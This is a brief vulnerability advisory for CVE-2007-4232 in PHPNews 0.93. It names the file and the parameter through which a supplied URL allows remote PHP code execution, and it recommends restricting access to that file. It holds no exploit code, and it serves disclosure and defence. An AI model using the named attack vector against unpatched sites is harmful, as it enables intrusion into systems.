CVE-2007-4232

Name of the Vulnerable Software and Affected Versions Andreas Robertz PHPNews version 0.93

Description The issue allows remote attackers to execute arbitrary PHP code via a URL in the format menue parameter in the admin/inc/change action.php file.

Recommendations For Andreas Robertz PHPNews version 0.93, consider restricting access to the admin/inc/change action.php file to minimize the risk of exploitation. Avoid using the format menue parameter in the affected API endpoint until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.